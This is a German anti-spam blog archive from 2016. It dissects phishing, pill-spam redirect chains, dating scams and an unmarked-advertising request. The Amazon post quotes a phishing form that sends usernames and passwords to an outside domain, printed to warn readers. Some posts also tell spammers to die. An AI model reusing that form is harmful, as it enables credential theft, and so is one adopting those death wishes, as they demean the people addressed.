Schlagwortarchiv „Screenshot“

Hallo eBay, ist noch alles knusper bei euch‽

Freitag, 15. April 2016

Nutzer der Handy-App von eBay¹ können den folgenden Hinweis in ihrer App sehen:

Screenshot der eBay-App. Im unteren Bereich ist ein Overlay mit folgendem Text eingeblendet: 'Helfen Sie uns, Ihr eBay-Konto zu schützen (Link) Bestätigen Sie Ihre persönlichen Daten'.

Helfen Sie uns, Ihr eBay-Konto zu schützen
Bestätigen Sie Ihre persönlichen Daten

Es handelt sich hier nicht um einen Phishing-Versuch.

Ich war mir auf dem ersten Blick völlig sicher, dass es Phishing ist, und meine einzige Frage war, wie die Phisher es wohl geschafft hätten, ihre Phishing-Einleitung als Overlay in die eBay-App einzublenden. (Ich halte es nicht für unmöglich, dass Kriminelle solche Möglichkeiten finden und ausnutzen – Smartphones sind leider sehr gefährliche und für kriminelle Versuche sehr offene Geräte.)

Ich habe mich (zum Glück) getäuscht.

Diese Meldung kommt wirklich von eBay. Und diese Meldung ist wirklich sehr dumm gestaltet, denn sie drückt bei ihren Empfängern auf die gleichen psychologischen Knöpfe wie typische Phishing-Mails:

Bereits bekannte Kundendaten sollen noch einmal bestätigt werden;
dies soll nicht etwa über einen von der Mitteilung unabhängigen Aufruf der eBay-Website, sondern über einen Link geschehen; und
es ist wegen „der Sicherheit“, wegen „des Schutzes des Kontos“ erforderlich.

Das ist – wenn man einmal von dem von Phishern gern angewendeten zusätzlichen Druckmittel einer Fristsetzung oder aufkommender Kosten absieht – genau die gleiche Ausdrucksweise, mit der Menschen sonst dazu gebracht werden sollen, ihre Konten und persönlichen Daten der Organisierten Kriminalität zur Verfügung zu stellen, indem sie die Zugangsdaten in schnell aufgeschäumten Webseiten im Design der entsprechenden Unternehmen eingeben und absenden. (In jüngerer Zeit wird auch häufig ein HTML-Dokument an die E-Mail angehängt, das man ausfüllen und absenden soll – mit gleichem Ergebnis.)

Auch die unter diesem Link hinterlegte Seite sieht so aus, wie ich es von der ersten Seite eines Phishing-Versuches gewohnt bin, der zunächst Accountdaten haben will, bevor weitere Dateneingaben (Anschrift, Bankverbindung, Kreditkarte) erschlichen werden [die unkenntliche Telefonnummer im Screenshot ist nicht von eBay]:

Screenshot der eBay-Seite zur Datenbestätigung -- Helfen Sie uns, Ihr eBay-Konto zu schützen -- Für noch mehr Sicherheit vergewissern Sie sich bitte, dass Ihre personenbezogenen Daten auf dem aktuellen Stand sind. -- E-Mail -- Mobiltelefon

Und genau das führt eBay gegenüber seinen Kunden als gewöhnliche Form der Kommunikation von eBay zum Kunden ein. Ganz so, als sei das Problem mit Phishing noch nicht groß genug; als müsse man seine Kunden zudem daran gewöhnen, dass genau die gleichen Kommunikationsmuster aus typischen Betrugsmails eine gewöhnliche Form der geschäftlichen Kommuniaktion seien und den Betrug auf diese Weise mit Autorität und Glaubwürdigkeit „aufladen“.

Das erschwert die sichere Erkennung von Phishing und zerstört den Schutz durch einen mit ungewöhnlichen Vorgängen und Aufforderungen aufkommenden Verdacht.

Die Folgen dieser dummen Entscheidung eBays werden nicht lange auf sich warten lassen – arglose Nutzer werden vermehrt auf Phishing-Mails hereinfallen, da sie ihren Stil für einen authentischen eBay-Stil halten. Dies gilt in besonderer Weise, als dass den Kriminellen eine sehr umfangreiche Datenbank mit Mailadressen und Accountdaten zur Verfügung steht, die bei eBay benutzt wurden oder noch werden. (Siehe zur Vorgeschichte dieses Datenlecks meine vorsichtig formulierte Mutmaßung hier auf Unser täglich Spam, als auf einmal hochgefährliches eBay- und PayPal-Phishing in Mail an exklusiv für eBay und PayPal benutzte Mailadressen auftauchte.)

eBay führt sich gerade wie ein Freund und Förderer der Organisierten Kriminalität auf; ganz so, als wollte eBay Phishing zu einem Erfolgsrezept für gewerbsmäßige Betrüger machen.

Das ist schlecht. Und es sollte geändert werden.

Von eBay.

So schnell wie möglich, am besten sofort!

¹Ein Dank für die Screenshots und den Hinweis geht an meinen Leser M.S.

Re:

Mittwoch, 30. März 2016

Tja, mit den Worten hat es dieser Spammer nicht so, stattdessen „erfreut“ er seine Empfänger mit einem 55,3 KiB schweren Bildchen, das deutlich weniger als tausend Worte sagt:

Abbildung einer Medikamentenflasche mit Etikett 'VigRX for Men, oral', an der Medikamentenflasche ein 'Product Security Seal', dass dazu auffordert, auf einer Website sechzehn Neunen einzugeben, um die Echtheit des Produktes zu prüfen, dazu der Text 'Natürlich und effektiv. Die erste Wahl seit 2001. Offizielle Website von VigRX.

Ich mag ja das Spamsiegel mit den vielen Neunen, das mir ermöglicht, die Echtheit zu überprüfen – hier noch einmal etwas vergrößert und dadurch leider verwaschen, aber in seiner Peinlichkeit viel deutlicher:

Detail aus der Spam. Das Siegel. 'Visit VigRX.com & input code -- Check Authenticity -- 9999 9999 9999 9999 -- LeadingEdge Health -- Product security seal

Ob die so angepriesene Pimmelpille wirklich etwas für den Pimmel tut, kann ich natürlich nicht sagen, aber zur Förderung zur Selbstmassage des Zwerchfells ist sie nicht schlecht.

Nach diesem Einblick in die von sechzehn Neunen besiegelte Echtheit des Produktes noch ein weiterer Blick in seine Präsentation im Web – natürlich nehme ich aus naheliegenden Gründen keinen „richtigen“ Browser dafür, sondern schaue mir auf der Kommandozeile an, was einem Besucher unbemerkt alles zugemutet wird. In den folgenden Zeilen habe ich stark gekürzt, um die endlosen Javascript-, Tracker- und Zählerwüsten zu ersparen¹:

$ lynx -mime_header http://www.exelorio.biz.ua/exelorio/index.html
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Mar 2016 06:41:46 GMT
Content-Type: text/html
Content-Length: 1496
Connection: close
Last-Modified: Tue, 29 Mar 2016 14:59:18 GMT
ETag: "37c0390-5d8-52f314605d690"
Accept-Ranges: bytes
Vary: Accept-Encoding

<!-- Rd. dreißig Zeilen Javascript entfernt -->
<META HTTP-EQUIV="REFRESH" CONTENT="1; URL=
http://www.exelorio.biz.ua/medipreise/index.html">
$ _

Tja, so ist das eben, wenn man eine „offizielle Website“ aus der Spam besucht – das ist niemals ein direkter Link, sondern immer eine alles verschleiernde Weiterleitungswüste. Und nein, mit einer Weiterleitung ist es nicht genug. Auch hier habe ich wieder stark gekürzt:

$ lynx -mime_header http://www.exelorio.biz.ua/medipreise/index.html
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 30 Mar 2016 06:49:02 GMT
Content-Type: text/html
Content-Length: 1488
Connection: close
Last-Modified: Tue, 29 Mar 2016 14:58:52 GMT
ETag: "37c038e-5d0-52f31448237bd"
Accept-Ranges: bytes
Vary: Accept-Encoding

<!-- Rd. dreißig Zeilen Javascript entfernt -->
<META HTTP-EQUIV="REFRESH" CONTENT="1; URL=
http://www.medipreise.info/#!vigrx/q5zpo">

$ _

Ob es wohl gleich noch eine Weiterleitung gibt?

$ lynx -mime_header 'http://www.medipreise.info/#!vigrx/q5zpo' | sed '/^\s*$/q'
HTTP/1.1 200 OK
Cache-Control: max-age=0, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Wed, 30 Mar 2016 07:01:18 GMT
ETag: ffca9f612019e88c0c0b71d1b0c10a32
Expires: -1
Pragma: no-cache
Server: Pepyaka/1.9.9
Vary: User-Agent,Accept-Encoding
Via: 1.0 username.wix.com
X-Seen-By: /0b3tu7BwMUubvM+8DFnyIZhbXxmdS0SoYtN65Ns3dwVg8yBNrCddpK11/FwIFN7,LwsIp90Tma5sliyMxJYVEimxe5u57vJkW8Ut+ygV+W3naXGSE7xQP0F5eUkr7UI2,Tw2AanFDQ+Wwo8Xxk6ZL7rHKeAJXtkPxqn+uc4aMlOC9TZSDiwEgQLyYAOfMlNNfnUoPRWylvzmW1WtoYIgS/A==,9/zAiwmuIQ5G9xgIqi9IpfKjiM3HhjsT5sK9PwlANII=
X-Wix-Renderer-Server: app205.vae.aws
X-Wix-Request-Id: 1459321278.2271453355868244144
Content-Length: 16073
Connection: Close

$ _

Aber nein. Damit sind wir endlich am „Ziel“ angekommen – auf einer tollen Seite mit dem tollen Titel „Preisvergleich in Apotheken“, die so stark auf Javascript setzt, dass sie ohne Javascript fast nichts mehr anzeigt. Weil der Spammer es nicht so mit Technik hat und das Internet eigentlich nur zum Spammen verwenden möchte, wurde diese Seite schnell mit dem kostenlos nutzbaren „Website Builder“ unter wix (punkt) com zusammengeklickt², dessen Website einem eventuellen Besucher ohne Javascript übrigens auch gar nichts zu sagen hat, nicht einmal ein Impressum ist verfügbar. Dafür gibts wenigstens ein Video. Hier bekommt die „Generation Jamba“ die Gelegenheit geboten, sich ins Web zu entfalten… ach! 🙁

So, jetzt aber zum gülden gleißenden Glanzstück der flüchtigen Recherche. Hier ist der Inhalt der Website der Spamkünstler, zusammengesetzt aus etlichen Quellen, technisch realisiert mit wix (punkt) com, inhaltlich hochreiner Bullshit, dargestellt in einem Firefox mit abgeschaltetem Javascript:

VigRX

VigRX™ ist ein ganzheitliches [Bingo!] und natürliches [Bingo!] Nahrungsergänzungsmittel zur Stärkung der männlichen Potenz und zur Steigerung der Penisgröße [Bingo!]. Es liefert wichtige Vitamine [Bingo!] und Nährstoffe [Bingo!] und optimiert [Bingo!] hierdurch die Durchblutung im Genitalbereich, was zu härteren und länger anhaltenden Erektionen führt. Die Wirkung fördert [Bingo!] zudem das körpereigene Zellwachstum [Bingo!] im Penis und setzt somit ein natürliches Peniswachstum [Bingo!] in Gang.

Willkommen auf der offiziellen Webseite von VigRX™. | 5% OFF Code: XXQRT8

© 2016 Die günstigsten preise [sic!]

Nun, ich wünsche guten Appetit mit dem ganzheitlichen und natürlichen Nahrungsergänzungsmittel, das den Pimmel länger macht. Der Link auf die „offizielle Website“ ist über Googles URL-Kürzungsdienst maskiert, weil Spammer nun einmal keine direkten Links mögen und weil so…

$ lynx -mime_header http://goo.gl/nvzC2D | sed '/^\s*$/q'
HTTP/1.0 301 Moved Permanently
Strict-Transport-Security: max-age=10886400;
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Wed, 30 Mar 2016 09:32:38 GMT
Location: http://track.healthtrader.com/track.php?c=cmlkPTEwMDU5MyZhaWQ9NTAwMTAxNjI
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Accept-Ranges: none
Vary: Accept-Encoding

$ _

…die angehängte Affiliate-ID weniger auffällt. Auf der Zielseite gibt es übrigens keinerlei Inhalte, die man ohne Flash und Javascript betrachten könnte – und ein in einem sicher konfigurierten Browser sichtbares Impressum gibt es auch nicht. Aber wozu denn auch, es geht ja nur um die Gesundheit. 😈

¹Die gelegentlich sichtbare Pipe auf sed ist dafür da, die Ausgabe nach den HTTP-Headerzeilen (also nach der ersten Leerzeile) abzubrechen. Für die Syntax von sed kann ich nichts, außer vielleicht sagen, dass es nicht halb so schlimm ist, wie es aussieht – aber oft sehr nützlich. Der eingefügte Kommentar mit dem Hinweis auf eine Löschung ist natürlich von mir.

²Natürlich kann der mir unbekannte Betreiber von wix (punkt) com nichts dafür, dass ein derartiges Angebot auch von Vollidioten wie diesem Spammer genutzt wird. Eine auch in einem sicher konfigurierten Browser sichtbare Kontaktadresse für die Meldung eines Missbrauches hätte ich gut gefunden, das Fehlen einer solchen Kontaktadresse halte ich für ein Zeichen, dass man von diesem Dienst unbedingt die Finger lassen sollte. Außer natürlich, man ist Spammer und möchte mit seinen grenzkriminellen oder offen kriminellen Webauftritten nicht vorzeitig aus dem Web entfernt werden… dafür bietet wix (punkt) com in der momentanen Form ein ideales Biotop.

Ihr Amazon-Konto wurde ausgesetzt

Mittwoch, 23. März 2016

Und ich habe doch gar keines… 😉

Von: amazon (punkt) powering (at) msg (punkt) afterbuy (punkt) de
An: gammelfleisch (at) tamagothi (punkt) de

Diese Spam geht an alle möglichen aus dem Internet eingesammelten Adressen, und der Spammer fälscht zwar den Absender, ist aber zu doof dazu, es so zu machen, dass der Absender auch wirklich nach Amazon aussieht. Aber zum Ausgleich…

Hallo von Amazon-Sicherheit,

…sieht die Anrede auch nicht ganz so überzeugend aus. 😀

Hier ist eine wichtige Nachricht von Amazon.de. Bitte lesen Sie diese Nachricht sorgfaeltig durch, da sie Ihr Kundenkonto bei Amazon.de betrifft.

Wir ueberpruefen routinemaessig Kundenkonten. Bei der Pruefung Ihres Kundenkontos erhaertete sich leider unser Verdacht, dass ein Unberechtigter Zugriff auf dieses hatte.

Aus diesem Grund haben wir Ihr Kundenkonto voruebergehend gesperrt. Niemand kann derzeit auf Ihr Kundenkonto zugreifen, Sie eingeschlossen.

Oh, wie bitter! Amazon nimmt jetzt wohl auf seiner Website über eine noch völlig unbekannte Schnittstelle den Besuchern Fingerabdrücke ab, und wenn jemand das richtige Passwort eingibt, aber den falschen Fingerabdruck hat, dann wird einfach der Account gesperrt. Und es gibt nur eine einzige Möglichkeit, was man dagegen tun kann:

Um Ihr Kundenkonto zu entsperren, befestigt auf diesem E-Mail [sic!] sie haben das Formular.

Bitte laden Sie das Formular und geben Sie Ihre Daten.

Man muss den Anhang einer E-Mail öffnen, die von Unbekannten mit gefälschtem Absender und voller falscher Behauptungen in recht fragwürdigem Deutsch versendet wurde. Auch, wenn da diesmal keine Schadsoftware dranhängt¹, sondern nur ein krimineller Versuch, an die Passwörter anderer Leute zu kommen, ist das Öffnen von unverabredeten Anhängen in E-Mails immer eine ganz schlechte Idee.

Übrigens sieht das Formular im angehängten HTML-Dokument – was nach der stümperhaft formulierten Phishing-Spam gar nicht zu erwarten war – recht gut aus:

Das gesamte Design besteht nicht etwa aus Texten, sondern ist ein großes Bild, das bei einem anonym nutzbaren, kostenlosen Bildupload-Dienst hinterlegt wurde. Natürlich habe ich directupload (punkt) net schon mit einer Mail darauf hingewiesen, dass der Dienst von Spammern missbraucht wird und erwarte deshalb eine baldige Löschung dieses Blendwerkes. Leider ist das nur ein Tropfen auf dem heißen Stein; ein neues Bild ist schnell hochgeladen und ein paar Millionen Spams sind schnell versendet, der Schaden wird schnell seine naiven Opfer auf anderem Wege finden. 🙁

Was auch immer man in diesem angehängten HTML-Dokument eingibt, geht nicht etwa zu Amazon, sondern…

<form method="post"
action="http://www.desentupidoraapolinario.com.br/zmd/404.php">
<input
style="top: -83px; height: 17px; left: -949px; width: 223px;"
id="user" name="user" value="" type="text" required/>
<input style="top: -99px; height: 17px; left: -949px; width: 223px;"
id="pass" name="pass" value="" type="password" required/><input
style="top: -123px; height: 20px; left: -890px; width: 165px;"
id="submit" name="submit" value="" type="submit">
</form>

…wird an eine deutlich weniger Vertrauen erweckende Domain gesendet. Aber das ist ja auch gar keine Überraschung, denn es handelt sich um eine Spam.

Und nein: Es kann nicht dazu kommen, dass eine ähnliche Mail einmal „echt“ ist. Solche E-Mails sind immer Phishing-Versuche. Amazon versendet keine E-Mail mit Anhängen, in denen Formulare liegen, in denen der Empfänger sein Passwort eingeben soll, und übrigens auch keine mit Links auf derartige Formulare. Und genau das Gleiche gilt für jeden anderen Anbieter von Webdiensten. Und natürlich auch für jede Bank. Und einfach nur generell. Die einzigen Menschen, die so etwas machen, sind Kriminelle.

Es ist also gar nicht so schwierig, nicht darauf hereinzufallen.

Selbst, wenn man sich einmal unsicher ist, sollte eine E-Mail niemals ein Grund zu panischem Geklicke werden, denn Kriminelle verstehen sich darauf, Menschen zu überrumpeln. Sie leben schließlich davon, dass ihre fiesen Tricks zumindest manchmal funktionieren. Immer vor dem Klick nachdenken. Und im Zweifelsfall einfach rückfragen.

Sobald Sie dies tun, werden Sie Ihr Konto wieder verwenden, um Produkte auf Amazon Europa zu verkaufen!

Freundliche Muller,
Das Amazon Services Team

Freundliche was?

Wenn Sie solche E-Mails nicht mehr erhalten mцchten, kцnnen Sie sich hier abmelden.

Ist ja schon ein bisschen peinlich, wenn man dabei den Link vergisst, nicht?

Aber der Kriminelle hat seine eigentliche „Botschaft“ ja rübergebracht, und jetzt ist er mit seinen Gedanken schon wieder bei den Nutten, so dass die Sorgfalt für eher formale, unwichtige Dinge eben nachlässt. Wenn man darauf achtet, kann man derartige Fehler in sehr vielen Spams sehen. Wenn sich der Spammer Mühe geben wollte, könnte er ja gleich arbeiten gehen.

© 2016 Amazon.com Inc. oder Tochtergesellschaften. Alle Rechte vorbehalten. Amazon Services Europe S.а r.l. 5 Rue Plaetis L-2338 Luxembourg, Handelsregisternummer Luxemburg: B-93815, Gesellschaftskapital 37.500 EUR, Gewerbelizenznummer: 100416, USt.-Identifikationsnummer Luxemburg: LU 19647148.

Nein, diese Spam wurde von einer dynamischen IP-Adresse eines Kunden bei einem Telekommunikationsanbieter aus Arizona, USA versendet; mit an Sicherheit grenzender Wahrscheinlichkeit handelt es sich um einen mit Schadsoftware feindselig übernommenen Rechner, der Teil eines Botnetzes ist. Diese Spam hat niemals einen Server von Amazon gesehen.

Einmal ganz davon abgesehen, dass beanspruchtes „geistiges Eigentum“ für eine automatisch erstellte E-Mail ein geistiger Dünnpfiff ist, auf den kaum noch eine Satire möglich ist. Aber das machen leider nicht nur Spammer, sondern auch andere Idioten.

¹Ich weiß, das hier keine Schadsoftware enthalten ist, weil ich mir den Quelltext des angehängten HTML-Dokumentes angeschaut habe. Es gibt keine andere Möglichkeit, das herauszubekommen. Ein Antivirus-Programm versagt regelmäßig, wenn es mit den neuesten Entwicklungen der Kriminellen konfrontiert ist.

Willst Du meine Mus*** anfassen?

Samstag, 13. Februar 2016

Deine was? Deine Muskelrisse vielleicht? Museumsexemplare wirst du ja wohl nicht haben…

Hallo!

Dieser „Name“ passt immer.

Ich habe auf Deinem Profil gesehen […]

Auf welchem Profil? Und wer soll das angelegt haben? Ich pflege es nicht, mich auf irgendwelchen Websites von börsennotierten Unternehmen ohne seriöses Geschäftsmodell¹ so weit datenmäßig zu entblößen, dass…

[…] wir wohnen nur 4 Kilometer auseinander!

…jemand dort herausbekommen könnte, wo ich wohne. Aber hey, du hast ja „mein Profil“ angeguckt und da keinen anderen Namen als „Hallo“ gefunden – da ist jedem sofort klar, dass es eine Lüge ist.

Magst mir nicht ne Freundschaftsanfrage stellen und vorbeikommen?

Ich soll Spammer als „Freunde“ bezeichnen? Hey, du bist…

Ich bin grad echt heiss…

…nicht nur „heiß“, du bist schon komplett hirnverbrannt.

Wir kennen uns ja eh vom sehen her, weißt Du noch wer ich bin?

Was könnte ich mal gesehen haben, was mich an den, die oder das AbsenderIn dieses Bullshits erinnert? Ich muss spontan an eine Mülltonne denken.

Schreib mir schnell, ja?
http://www.m3e2a.club/[ID entfernt]/

Schreib mir schnell, aber keine Mail! Stattdessen klick einfach in eine Spam. Dummes Klicken ist das neue „Schreiben“.

Der Link ist mit einer eindeutigen ID vergiftet. Wer darauf klickt, funkt an die Spammer zurück, dass die Spam ankommt und beklickt wird – das ist ein wirksames Mittel gegen Einsamkeit im Postfach, aber leider nicht so wirksam, wenn man auch etwas Erträgliches in seiner Mail haben möchte. Der Link führt nach der üblichen Kaskade von Weiterleitungen – ein direkter Link ist dem Spammer nun einmal zuwider – in die Website in der Domain myfunbook (punkt) net, wo man die aktuellen Designexperimente der Dating-Betrüger bewundern kann. Natürlich gibt es wieder einmal nur Frauen²:

Ja, eines der von irgendwo aus dem Internet mitgenommenen (und übrigens oft grottenschlecht skalierten) Bilder ist den Verbrechern verloren gegangen. Wie das passieren konnte? Die naheliegendste Erklärung ist: Weil die so sehr damit beschäftigt sind, diese betrügerische Dreckssite von einer Wegwerfdomain in die nächste und von einem Wegwerfserver in den nächsten umzuziehen und das Geld ihrer Opfer im Bordell zu verbraten, haben sie sich natürlich nach dem letzten Umzug noch nicht angeschaut, wie es aussieht. Wenn sie sich Mühe geben würden, könnten sie ja auch arbeiten gehen und brauchten nicht zu spammen.

Was denen, die auf einen solchen Köder hereinfallen, blüht, habe ich schon vor fünf Jahren beschrieben. Es kann gut sein, dass die Methoden inzwischen subtiler sind, aber der Betrug ist der gleiche. Und die Daten, die man auf solchen Seiten eingibt, gehen auch immer noch an richtig üble Verbrecher.

Bis gleich
Hanna

Geh sterben!

Keine Nachrichten mehr von mir?
http://www.m3e2a.club/abm/[ID entfernt]/

Ja, du mich auch!

¹Die Vergällung menschlicher Kommunikation mit Reklame ist kein seriöses Geschäftsmodell und zum Scheitern verurteilt.

²Wegen des klar sexuellen Inhaltes habe ich den Originalgröße-Screenshot bei Flickr als „eingeschränkt“ markiert. Deshalb ist eine Anmeldung an Flickr erforderlich, um ihn zu sehen. Angesichts der geringen Informationsdichte und der dummen Darbietung der Betrugsmasche halte ich diese Einschränkung nicht für einen großen Verlust.

Der Service Ihrer Online Klinik

Donnerstag, 4. Februar 2016

Oh, mit Deppen Leer Zeichen!

Immer wieder erfreulich und erbäulich, wenn sich das Streben nach gestalterischer Exzellenz in der HTML-Formatierung einer Spam mit geistigem Dünnpfiff und sondersamem sprachlichen Ausdruck kombiniert:

Die Links gehen auf die Website in der Domain interstelle (punkt) eu und führen nach diversen Weiterleitungen zu einer Betrugsapotheke in der Domain www (punkt) 121doc (punkt) de, die außerhalb der Europäischen Union in Guernsey verwaltet wird (die weiteren Einzelheiten muss jeder selbst bei der DeNIC herausbekommen, ich darf sie hier wegen der DeNIC-Nutzungsbedingungen nicht posten).

Es ist natürlich eine Spam, also funkt das (technisch ansonsten völlig unnötige) Weiterleitungsskript an die Spammer zurück, auf welchen Mailadressen die Spams ankommen, die beklickt werden. Die Spammer werden mit dieser Information etwas anzufangen wissen, was keinem Empfänger gefällt.

Claim aus dem Titel der Website der Betrugsapotheke: 121doc -- Ihre Online Klinik seit 2002 Aber von diesen Standardanmerkungen einmal abgesehen: Ich muss den Betrugsapothekern widerwillig zugestehen, dass sie in der optischen und psychologischen Präsentation ihres Betruges ordentlich zugelegt haben – wer einen Eindruck davon bekommen möchte, ohne seine Privatsphäre und seine Computersicherheit aufs Spiel zu setzen: Ich habe einen Screenshot der Sektion mit den Pimmelpillen bei Flickr hochgeladen. Hier hat jemand verstanden, was das Wichtigste am Betrug ist: Dass er für seine Opfer seriös aussieht. Es muss ein sehr erfahrener Betrüger sein…

Wer sich von etwas Design und irgendwo abgeschriebenen Worten verblenden lässt und sich nicht an anderen Stellen über diese „Apotheke“ informiert, kann also sehr leicht darauf hereinfallen.

Was von den „Online-Rezepten“ dieser Betrüger zu halten ist, mit denen sie ihre potenziellen Opfer zu verblenden versuchen, lässt sich im Wiki des Antispam e.V. nachlesen. Wer es ernsthaft für möglich hält, dass man bei einer mit asozialer und illegaler Spam beworbenen Betrugsapotheke richtige Medikamente statt lebensgefährlicher Giftpillen bekommt, der sollte gleich den ganzen Artikel dort lesen! Kurz von mir zusammengefasst: Wenn man darauf reingefallen ist und Glück hat, wird gar nichts geliefert und man bleibt wenigstens am Leben, so dass die angegebenen Daten „nur“ für Betrugsgeschäfte aller Art missbraucht werden und man zwei, drei Jahre immer wieder Polizisten, Ermittlungsrichtern, Staatsanwälten und Inkassobüros in nervenaufreibendem Schriftverkehr erklären „darf“, was es damit auf sich hat und wie es dazu gekommen ist. Wer weniger Glück hat, der bekommt „Medikamente“ geliefert und nimmt sie auch noch ein… 🙁

Bekanntschaft für Sex

Mittwoch, 3. Februar 2016

Immer wieder erstaunlich, dass derartige Anbieter ihre Angebote nur mit illegaler und asozialer Spam loswerden – was ich als deutliches Indiz dafür werte, dass man dort vor allem mit Bots chattet, und zwar vermutlich teuer.

Anders, als das – vom Spammer womöglich von irgendwo, zum Beispiel von einer Kampagne für die Nutzung von Kondomen „mitgenommene“ – Bildmaterial vermuten lässt, geht es beim Klick nicht auf eine Website, die irgendwas mit Sexymaus sein will, sondern auf eine Website in der Domain gmgstat (punkt) co (punkt) ua. Dort gibt es keine Mäuschen und keine Körperflüssigkeiten, sondern nur ein Frameset, in dem dann eine Seite aus der Domain alspa (punkt) info eingebettet wird. Diese Seite wiederum…

Screenshot meines Terminals mit der Ausgabe von lynx -mime_header -dump

…enthält nur einen in Javascript gecodeten Zähler (vermutlich hat der Vollidiot von Spammer noch nicht gehört, wie man mit einem grep über die Logdatei des Webservers und einer Pipe auf wc -l an wesentlich aussagekräftigere Zugriffszahlen für diese Drecksseite kommt) sowie eine Weiterleitung auf eine andere Seite in der gleichen Domain. Im nächsten Schritt kommt es dann endlich zur Weiterleitung auf eine Seite in der Domain sexymaus (punkt) com, natürlich mit angehängtem Affiliate-Link, damit der Spammer von den Betreibern der Domain sexymaus (punkt) com auch schön für seine illegale und asoziale Spam bezahlt wird:

Screenshot meines Terminals mit der Ausgabe von lynx -mime_header -dump

Dieser Spammer ist also ganz schön verschroben, wenn er sein eigentliches Geschäft zu verbergen sucht.

Den Betreibern der Domain sexymaus (punkt) com, die im Moment aktiv illegale und asoziale Spamwerbung finanzieren, lege ich nahe, anhand der in den Screenshots sichtbaren Affiliate-IDs ihre Verträge mit diesen Spammern zu beenden und Schadenersatz zu fordern, und zwar wegen der Anwendung illegaler Methoden, der damit verbundenen Beschädigung der Reputation und des Vertrauensbruchs fristlos. So lange sie das nicht tun, sind sie nämlich selbst die Spam. Und wer will schon gern mit Spam chatten?

Ach ja, warum ich das hier schreibe und nicht direkt an die Betreiber?

Ich hätte es wirklich gern an die Betreiber der Website unter sexymaus (punkt) com gemailt, aber leider zeigt mir diese mit illegaler und asozialer Spam beworbene Website ohne aktiviertes Javascript nichts an, so dass ich nicht an ein Impressum kommen kann. Und ich bin doch kein Idiot, dass ich angesichts der gegenwärtigen Kriminalität im Internet einer mit Spam beworbenen Website das Ausführen von Javascript in meinem Browser auf meinem Computer erlaube! Davon würde ich auch jedem anderen abraten.

Große rote Edelrose von Rosenbote

Freitag, 29. Januar 2016

Diese Spam eines Affiliate-Partners¹ eines deutschen Versenders ist eine Nichtkaufempfehlung, und wenn man mich danach fragt, sogar eine Niemalskaufempfehlung:

Die 233,1 KiB unverlangt zugestellten, „freudigen“ JPEG-Anhanges, die durch die Base-64-Codierung in der Mail übrigens zu rd. 300 KiB Datenmüll-Stopfmasse aufgeplustert sind, wurden mir mutmaßlich von einem „Geschäftspartner“ der Klitsche mit der in der Grafik angegebenen URL als Spam in das Postfach gemacht – und das Wort mutmaßlich steht hier nur, um die Hure Justitia zu besänftigen, denn ich kann mir beim besten Willen zurzeit keinen Grund vorstellen, warum jemand anders einen mir zuvor völlig unbekannten Blumenverhökerer mit einer derartigen illegalen und grenzkriminellen „Werbeaktion“ neue Kunden zutreiben sollte.

Nun, wer illegale und asoziale Spam für eine „Freude“ hält, der darf gern den illegal und asozial vorgehenden Spammern ihre stinkenden Geschäfte ermöglichen. Andere Menschen mit einem anderen Begriff von „Freude“ werden sich hoffentlich für lange Zeit merken (und das auch nach Möglichkeit gern und häufig weitersagen), dass die Rosen doch lieber an einem anderen Ort als ausgerechnet beim Spammerfinanzierer rosenbote (punkt) de gekauft werden sollten. Denn Spam ist immer ein ganz schlechtes Zeichen, das mindestens darauf hindeutet, dass jemandem sowohl seine Legalität als auch seine Reputation völlig egal sind. Welche Erfahrungen man mit solchen Gestalten erwarteterweise machen wird, lässt sich durch Benutzung eines handelsüblichen Gehirnes schon mittlerer Leistungsfähigkeit bereits im Vorfeld abschätzen.

¹Die über einen Wust von zwei Weiterleitungs-Skripten angehängte Affiliate-ID lautet übrigens: belboon=03898e092c8d01f913003ce1,4465685, – nur für den Fall, dass dieser Versender doch Wert auf seine Reputation legt. Die Verwendung solcher Praktiken sollte eine fristlose Kündigung jedes Vertrages ermöglichen.

Article inquiry on http://www.tamagothi.de/

Montag, 25. Januar 2016

HI team at Tamagothi.de

Das ist genau mein Name, Bruder Dörrkopf! Wie ich wirklich heiße, ist auf der Seite, mit der du deine Geschäftchen machen willst, eher schwierig zu übersehen.

How are you?

Ach, danke der Nachfrage, es geht mir eigentlich ganz gut. Ich habe nur so ein akutes Übelkeitsgefühl wegen der Spam, die du mir direkt ins Honigtöpfchen gemacht hast.

I came across your excellent German site: http://www.tamagothi.de/

How much would it be for an article placement with a do-follow link to a leading German finance/trading site in the main content area of an article, taking into account the 3 points below:

· We will get the German content written, which will be written by one of our high quality German writers. The content will beunique and definitely fit the nature of your site.

· The article is not marked as sponsored and will stay on the site permanently even if it rolls over into the archives.

· We will pay you via Paypal once the article is live.

Zunächst hättest du auf der von dir so umworbenen Website leicht einen Eindruck davon verschaffen können, wie ich zum Thema „Werbung auf meinen Websites“ stehe. Dass du darüber hinaus auch noch den expliziten Wunsch hast, dass ich meine Leser mit ungekennzeichneter Schleichwerbung verachte, lässt einen so tiefen Blick in deinen vergammelten Charakter zu, dass ich mich mit Grausen und verstärkter Übelkeit davon abwende.

Da brauche ich auch gar nicht mehr darüber nachzudenken, dass ich in der BRD für einen Link auf illegale Angebote haftbar gemacht werde – und hey, Spammer, es handelt sich bei deiner Mail bereits um eine klare Spam an automatisch eingesammeltes Adressmaterial, die als Werbemittel illegal ist. Da kann ich mir gut vorstellen, was verlinkt werden wird: Abzockcasinos, Betrugsapotheken und Markenimitatswebshops.

Please update me with a price and will speak to the suitable clients ASAP.

Wenn du dir etwas kaufen willst, kauf dir einen Lolly! Ein ungekennzeichnetes Podium für deine Schleichwerbung bei mir kriegst du nicht. (Allein schon, weil du auf illegale und asoziale Spam setzt, da brauchst du mich gar nicht mehr eigens dazu auffordern, dass ich meine paar Leser auch noch für eine Handvoll Klimpergroschen verachten soll.)

Thanks so much.

Danke für nichts! Geh einfach sterben, damit du endlich erfreulich tot bist! Dann bedanke ich mich auch.

Regards,

James – Manager

DigitalContentZone

Mit sprudelndem Schwall von frisch Erbrochenem
Nachtwächter – Spamtonnenleerungsobermanager
Inhalte statt Content

